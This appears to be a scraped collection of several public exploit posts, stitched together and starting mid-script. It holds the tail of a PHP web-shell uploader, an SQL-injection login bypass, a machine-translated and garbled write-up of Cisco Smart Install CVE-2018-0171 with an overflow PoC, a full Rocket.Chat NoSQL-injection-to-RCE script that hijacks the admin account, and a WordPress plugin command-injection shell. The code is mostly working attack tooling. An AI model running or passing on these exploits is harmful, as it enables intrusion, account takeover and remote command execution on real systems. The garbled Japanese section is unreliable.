"\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"currnt_date\"\r\n\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"productImage\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"productName\"\r\n\r\n"+randstr+"_TalhaDemirsoy\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"quantity\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"rate\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"brandName\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"categoryName\"\r\n\r\n2\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"productStatus\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"create\"\r\n\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB--\r\n" session.post(reqUrl, headers=reqHead, data=reqData) print("product name is "+randstr) print("shell name is "+shellname) reqUrl = url + "product.php" data = session.get(reqUrl) parser = BeautifulSoup(data.text, 'html.parser') find_shell = parser.find_all('img') for i in find_shell: if shellname in i.get("src"): print("Shell URL : " + url + i.get("src") + "?cmd=whoami")
HireHackking
# Exploit Title: Phone Shop Sales Managements System 1.0 - Authentication Bypass (SQLi) # Date: 2021-07-06 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html # Version: 1.0 # Tested on: Windows 10, XAMPP ########### # PoC # ########### Request: ======== POST /osms/Execute/ExLogin.php HTTP/1.1 Host: localhost Content-Length: 43 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/osms/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close Username=or+1%3D1%2F*&Password=or+1%3D1%2F* Payload: ========= Username=or 1=1/* Password=or 1=1/*
HireHackking
0x01はじめに
スマートインストールクライアントコードでは、スタックベースのバッファオーバーフローの脆弱性が見つかりました。攻撃者は、ログインを認証せずに任意のコードをリモートで実行できます。 Cisco Smartインストールは、新しいスイッチの簡単な展開を提供する「プラグアンドプレイ」構成および画像管理機能です。この機能により、ユーザーはCiscoスイッチをどこにでも配置し、ネットワークにインストールし、追加の構成要件なしで起動することができます。したがって、脆弱なネットワークデバイスを完全に制御できます。スマートインストールは、新しいスイッチに適したグラフィカルインターフェイス管理を提供するプラグアンドプレイの構成と画像管理機能です。初期構成プロセスを自動化し、オペレーティングシステムの現在ロードされている画像を介して新しいスイッチを提供します。この機能は、構成が変更されたときにホットプラグとホットプラグのリアルタイムバックアップも提供します。この機能は、デフォルトでクライアントで有効になっていることに注意してください。

0x02脆弱性の説明
Cisco iOSおよびiOS-XEシステムのSmartインストールクライアントコード(CVE-2018-0171)には、バッファスタックオーバーフローの脆弱性が存在します。攻撃者は、悪意のあるデータパケットをTCP 4786ポートにリモートで送信し、脆弱性を活用してターゲットデバイスのスタックオーバーフローの脆弱性をトリガーし、デバイスがサービスを拒否したり、リモートコマンドの実行を引き起こしたりし、攻撃者は脆弱性に影響を与えるネットワークデバイスをリモートで制御できます。 Cisco Switchであると報告されています
TCP 4786ポートはデフォルトで開いています

0x03脆弱性をチェック
1。シスコネットワークデバイスにTCP 4786ポートが開いている場合、攻撃に対して脆弱です。このようなデバイスを見つけるには、NMAPを介してターゲットネットワークをスキャンするだけです。
NMAP -P T:4786 192.168.1.0/24
2。ネットワークデバイスでスマートインストールクライアントの機能が有効になっているかどうかを確認するために、次の例は、スマートインストールクライアントとして構成されたCisco Catalyst Switchのshow vstack configコマンドの出力です。
switch1#show vstack config
chole: client(smartinstall exabled)

switch2#show vstack config
capability:クライアント
Opera Mode:有効になっています
役割:クライアント
役割:クライアントおよびオペラモード:有効または役割:show vstack configコマンド出力からのクライアント(smartinstall有効)情報は、この機能がデバイスで有効になっていることを確認します。
3. Cisco Machineでコマンドを実行して判断を下し、ポート4786を開き、SMIを使用します。
スイッチショーTCPブリーフすべて
tcblocalアドレス外国住所(州)
0344b794*.4786*。*聞いてください
0350A018*.443*。*聞いてください
03293634*.443*。*聞いてください
03292d9c*.80*。*聞いてください
03292504*.80*。*聞いてください
Cisco iOSおよびIEXソフトウェアバージョンチェック:
ルーターショーバージョン
Cisco IOSソフトウェア、C2951ソフトウェア(C2951-UniversAlk9-M)、バージョン15.5(2)T1、リリースソフトウェア(FC1)
テクニカルサポート: http://www.cisco.com/techsupport
Copyright(c)1986-2015 Cisco Systems、Inc。
Mon 22-Jun-15 09:32 by prod_rel_teamをコンパイルしました
iOS-xe-device#showバージョン
Cisco IOSソフトウェア、Catalyst L3 Switchソフトウェア(CAT3K_CAA-UNIVERSALK9-M)、バージョンDenali 16.2.1、リリースソフトウェア(FC1)
テクニカルサポート: http://www.cisco.com/techsupport
Copyright(c)1986-2016 Cisco Systems、Inc。
MCPREによるSun 27-Mar-16 21:47を編集しました
4.脆弱性が影響を受けたかどうかわからない場合は、CiscoのCisco IOSソフトウェアチェッカーを使用して検出できます。
https://tools.cisco.com/security/center/softwarechecker.x
5。次のスクリプトを使用して、対応するIPポートが実際に開いているかどうかを検出します。 Cisco SMIプロトコル
https://github.com/cisco-talos/smi_check/blob/master/smi_check.py
プロトコル機能はMSFにあります
https://github.com/rapid7/metasploit-framework/commit/c67e407c9c5cd28d555e1c2614776e05b628749d
#python smi_check.py -i targetip
[情報] TCPプローブをTargetIP:4786に送信します
[情報] Smart Installクライアント機能は、TargetIP:4786でアクティブになります
[情報] TargetIPが影響を受けます

0x04衝撃の範囲
インパクト機器:Catalyst 4500スーパーバイザーエンジン
シスコ触媒3850シリーズスイッチ
Cisco Catalyst 2960シリーズスイッチ
スマートインストールクライアントの一部を含むデバイスも影響を受ける可能性があります:Catalyst 4500スーパーバイザーエンジン
Catalyst 3850シリーズ
Catalyst 3750シリーズ
Catalyst 3650シリーズ
Catalyst 3560シリーズ
Catalyst 2960シリーズ
Catalyst 2975シリーズ
IE 2000
IE 3000
IE 3010
IE 4000
IE 4010
IE 5000
SM-ES2 SKUS
SM-ES3 SKUS
NME-16ES-1G-P
SM-X-ES3 SKUS

0x05脆弱性の確認
以下は、この脆弱性の検証のためのPOCです。
#smi_ibc_init_discovery_bof.py
ソケットをインポートします
インポート構造
OptParse Import optionParserから

#ターゲットオプションを解析します
parser=optionParser()
parser.add_option( '-t'、 ' - ターゲット'、dest='ターゲット'、help='スマートインストールクライアント'、デフォルト='192.168.1.1')parser.add_option( '-p'、 '-port'、dest='port'、type='int'、help=4786) parser.parse_args()

def Craft_tlv(t、v、t_fmt='!i'、l_fmt='!i'):
return struct.pack(t_fmt、t) + struct.pack(l_fmt、len(v)) + v

def send_packet(ソック、パケット):
sock.send(パケット)

def受信(靴下):
sock.recv()を返します
__name__=='__main __' :の場合

印刷'[*]スマートインストールクライアントに接続する'、options.target、 'port'、options.port

con=socket.socket(socket.af_inet、socket.sock_stream)
con.connect((options.target、options.port))

ペイロード='bbbb' * 44 shellcode='d' * 2048

data='a' * 36 + struct.pack( '!i'、len(payload) + len(shellcode) + 40) +ペイロード

tlv_1=craft_tlv(0x00000001、data)tlv_2=shellcode

PKT=HDR + TLV_1 + TLV_2

印刷'[*]悪意のあるパケットを送信
send_packet(con、pkt)
スイッチを攻撃するには、次のコマンドを実行します。
ホスト$ ./SMI_IBC_INIT_DISCOVERY_BOF.PY-T 192.168.1.1
スイッチでは、クラッシュメッセージを表示して再起動する必要があります。
00:10:35 UTC MON MAR 1 19933: CPUVECTOR 1200、PC=42424240の予期しない例外
-traceback=42424240
crashinfoをflash:/crashinfo_ext/crashinfo_ext_15に書き込みます
===フラッシングメッセージ(00:10:39 UTC MON MAR 1993)===buffered messages:
.
キューに掲載されたメッセージ:
Cisco IOSソフトウェア、C2960ソフトウェア(C2960-LANBASEK9-M)、バージョン12.2(55)SE11、リリースソフトウェア
(FC3)
テクニカルサポート: http://www.cisco.com/techsupport
Copyright(c)1986-2016 Cisco Systems、Inc。
ProD_REL_TEAMによってWED 17-AUG-16 13:46をコンパイルしました
命令TLBミス例外(0x1200)!
srr0=0x42424240 srr1=0x00029230 srr2=0x0152ace4 srr3=0x00029230
esr=0x00000000親愛なる=0x00000000 tsr=0x840000000 dbsr=0x00000000
CPUレジスタContext:
Vector=0x00001200 PC=0x42424240 msr=0x00029230 cr=0x33000053
LR=0x42424242 Ctr=0x014D5268 XER=0xc000006a
R0=0x42424242 R1=0x02B1B0B0 R2=0x0000000 R3=0x032D12B4
R4=0x000000B6 R5=0x0000001E R6=0xAA3BEC00 R7=0x0000014
R8=0x0000001E R9=0x00000000 R10=0x001BA800 R11=0xfffffff
R12=0x00000000 R13=0x00110000 R14=0x0131e1a8 r15=0x02b1b1a8
R16=0x02B1B128 R17=0x00000000 R18=0x0000000 R19=0x02B1B128
R20=0x02b1b128 R21=0x00000001 R22=0x02b1b128 r23=0x02b1b1a8
R24=0x00000001 R25=0x00000000 R26=0x42424242 R27=0x42424242
R28=0x42424242 R29=0x42424242 R30=0x42424242 R31=0x42424242
スタックtrace:
PC=0x42424240、sp=0x02b1b0b0
フレーム00: SP=0x42424242 PC=0x42424242

0x06脆弱性修正
#conf t
構成コマンドを入力します
ライン。 CNTL/zで終了します。
NSJ-131-6-16-C2960_7(config)#no
vstack
NSJ-131-6-16-C2960_7(config)#exit
重要なのは、この文がvstackなしです
もう一度見て、ポートがオフになっています。
#show TCPブリーフすべて
TCBローカル
住所の住所
(州)
075A0088 *.443
*。*
聞く
0759F6C8 *.443
*。*
聞く
0759ED08 *.80
*。*
聞く
0759E348 *.80
*。*
聞く

0x06脆弱性ハザード
これにより、攻撃者が影響を受けるデバイスにバッファオーバーフローを引き起こす可能性があります。これには、次の効果があります。
トリガーデバイスリロード
攻撃者がデバイスで任意のコードを実行できるようにします
影響を受けるデバイスに無限のループ再起動を負担すると、それはデバイスのクラッシュです

0x07脆弱性修正
#conf t
1行に1つの構成コマンドを入力します。 CNTL/zで終了します。
NSJ-131-6-16-C2960_7(config)#no vstack
NSJ-131-6-16-C2960_7(config)#exit
重要なのは、この文がvstackなしです
もう一度見て、ポートがオフになっています。
#show TCPブリーフすべて
TCBローカルアドレス外国住所(州)
075A0088 *.443 *。 *聞いてください
0759F6C8 *.443 *。 *聞いてください
0759ED08 *.80 *。 *聞いてください
0759E348 *.80 *。 *聞いてください

0x08参照
https://EMBEDI.com/blog/cisco-smart-install-remote-code-execution/
https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20180328-smi2
https://www.anquanke.com/post/id/103122
https://mp.weixin.qq.com/s/cmyuugfmox5pk89fo_er8w
https://www.youtube.com/watch?v=ce7knk6ujukfeature=youtu.bet=99
https://www.youtube.com/watch?v=tsg5ezvudnufeature=youtu.be
HireHackking

Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) (2)

HACKER · %s · %s

# Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) (2) # Author: enox # Date: 06-06-2021 # Product: Rocket.Chat # Vendor: https://rocket.chat/ # Vulnerable Version(s): Rocket.Chat 3.12.1 (2) # CVE: CVE-2021-22911 # Credits: https://blog.sonarsource.com/nosql-injections-in-rocket-chat # Info : This is a faster exploit that utilizes the authenticated nosql injection to retrieve the reset token for administrator instead of performing blind nosql injection. #!/usr/bin/python import requests import string import time import hashlib import json import oathtool import argparse parser = argparse.ArgumentParser(description='RocketChat 3.12.1 RCE') parser.add_argument('-u', help='Low priv user email [ No 2fa ]', required=True) parser.add_argument('-a', help='Administrator email', required=True) parser.add_argument('-t', help='URL (Eg: http://rocketchat.local)', required=True) args = parser.parse_args() adminmail = args.a lowprivmail = args.u target = args.t def forgotpassword(email,url): payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"sendForgotPasswordEmail\\",\\"params\\":[\\"'+email+'\\"]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/sendForgotPasswordEmail", data = payload, headers = headers, verify = False, allow_redirects = False) print("[+] Password Reset Email Sent") def resettoken(url): u = url+"/api/v1/method.callAnon/getPasswordPolicy" headers={'content-type': 'application/json'} token = "" num = list(range(0,10)) string_ints = [str(int) for int in num] characters = list(string.ascii_uppercase + string.ascii_lowercase) + list('-')+list('_') + string_ints while len(token)!= 43: for c in characters: payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"getPasswordPolicy\\",\\"params\\":[{\\"token\\":{\\"$regex\\":\\"^%s\\"}}]}"}' % (token + c) r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False) time.sleep(0.5) if 'Meteor.Error' not in r.text: token += c print(f"Got: {token}") print(f"[+] Got token : {token}") return token def changingpassword(url,token): payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\"]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) if "error" in r.text: exit("[-] Wrong token") print("[+] Password was changed !") def twofactor(url,email): # Authenticating sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}' headers={'content-type': 'application/json'} r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) if "error" in r.text: exit("[-] Couldn't authenticate") data = json.loads(r.text) data =(data['message']) userid = data[32:49] token = data[60:103] print(f"[+] Succesfully authenticated as {email}") # Getting 2fa code cookies = {'rc_uid': userid,'rc_token': token} headers={'X-User-Id': userid,'X-Auth-Token': token} payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.totp.secret+})()"}' r = requests.get(url+payload,cookies=cookies,headers=headers) code = r.text[46:98] print(f"Got the code for 2fa: {code}") return code def admin_token(url,email): # Authenticating sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}' headers={'content-type': 'application/json'} r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) if "error" in r.text: exit("[-] Couldn't authenticate") data = json.loads(r.text) data =(data['message']) userid = data[32:49] token = data[60:103] print(f"[+] Succesfully authenticated as {email}") # Getting reset token for admin cookies = {'rc_uid': userid,'rc_token': token} headers={'X-User-Id': userid,'X-Auth-Token': token} payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.password.reset.token+})()"}' r = requests.get(url+payload,cookies=cookies,headers=headers) code = r.text[46:89] print(f"Got the reset token: {code}") return code def changingadminpassword(url,token,code): payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\",{\\"twoFactorCode\\":\\"'+code+'\\",\\"twoFactorMethod\\":\\"totp\\"}]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) if "403" in r.text: exit("[-] Wrong token") print("[+] Admin password changed !") def rce(url,code,cmd): # Authenticating sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() headers={'content-type': 'application/json'} payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"totp\\":{\\"login\\":{\\"user\\":{\\"username\\":\\"admin\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}},\\"code\\":\\"'+code+'\\"}}]}"}' r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) if "error" in r.text: exit("[-] Couldn't authenticate") data = json.loads(r.text) data =(data['message']) userid = data[32:49] token = data[60:103] print("[+] Succesfully authenticated as administrator") # Creating Integration payload = '{"enabled":true,"channel":"#general","username":"admin","name":"rce","alias":"","avatarUrl":"","emoji":"","scriptEnabled":true,"script":"const require = console.log.constructor(\'return process.mainModule.require\')();\\nconst { exec } = require(\'child_process\');\\nexec(\''+cmd+'\');","type":"webhook-incoming"}' cookies = {'rc_uid': userid,'rc_token': token} headers = {'X-User-Id': userid,'X-Auth-Token': token} r = requests.post(url+'/api/v1/integrations.create',cookies=cookies,headers=headers,data=payload) data = r.text data = data.split(',') token = data[12] token = token[9:57] _id = data[18] _id = _id[7:24] # Triggering RCE u = url + '/hooks/' + _id + '/' +token r = requests.get(u) print(r.text) ############################################################ # Getting Low Priv user print(f"[+] Resetting {lowprivmail} password") ## Sending Reset Mail forgotpassword(lowprivmail,target) ## Getting reset token through blind nosql injection token = resettoken(target) ## Changing Password changingpassword(target,token) # Privilege Escalation to admin ## Getting secret for 2fa secret = twofactor(target,lowprivmail) ## Sending Reset mail print(f"[+] Resetting {adminmail} password") forgotpassword(adminmail,target) ## Getting admin reset token through nosql injection authenticated token = admin_token(target,lowprivmail) ## Resetting Password code = oathtool.generate_otp(secret) changingadminpassword(target,token,code) ## Authenticating and triggering rce while True: cmd = input("CMD:> ") code = oathtool.generate_otp(secret) rce(target,code,cmd)
HireHackking
# Exploit Title: WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2) # Date: 07.07.2021 # Exploit Author: Beren Kuday GORUN # Vendor Homepage: https://wordpress.org/plugins/plainview-activity-monitor/ # Software Link: https://www.exploit-db.com/apps/2e1f384e5e49ab1d5fbf9eedf64c9a15-plainview-activity-monitor.20161228.zip # Version: 20161228 and possibly prior # Fixed version: 20180826 # CVE : CVE-2018-15877 """ ------------------------- Usage: ┌──(root@kali)-[~/tools] └─# python3 WordPress-Activity-Monitor-RCE.py What's your target IP? 192.168.101.28 What's your username? mark What's your password? password123 [*] Please wait... [*] Perfect! www-data@192.168.101.28 whoami www-data www-data@192.168.101.28 pwd /var/www/html/wp-admin www-data@192.168.101.28 id uid=33(www-data) gid=33(www-data) groups=33(www-data) """ import requests from bs4 import BeautifulSoup def exploit(whoami, ip): while 1: cmd = input(whoami+"@"+ip+" ") url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools' payload = "google.com.tr | " + cmd data = {'ip': payload , 'lookup' : 'lookup' } x = requests.post(url, data = data, cookies=getCookie(ip)) html_doc = x.text.split("<p>Output from dig: </p>")[1] soup = BeautifulSoup(html_doc, 'html.parser') print(soup.p.text) def poc(ip): url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools' myobj = {'ip': 'google.fr | whoami', 'lookup' : 'lookup' } x = requests.post(url, data = myobj, cookies=getCookie(ip)) html_doc = x.text.split("<p>Output from dig: </p>")[1] soup = BeautifulSoup(html_doc, 'html.parser') print("[*] Perfect! ") exploit(soup.p.text, ip) def getCookie(ip): url = 'http://' + ip + '/wp-login.php' #log=admin&pwd=admin&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwordy%2Fwp-admin%2F&testcookie=1 data = {'log':username, 'pwd':password, 'wp-submit':'Log In', 'testcookie':'1'} x = requests.post(url, data = data) cookies = {} cookie = str(x.headers["Set-Cookie"]) for i in cookie.split(): if(i.find("wordpress") != -1 and i.find("=") != -1): cookies[i.split("=")[0]] = i.split("=")[1][:len(i.split("=")[1])-1] return cookies ip = input("What's your target IP?\n") username = input("What's your username?\n") password = input("What's your password?\n") print("[*] Please wait...") poc(ip)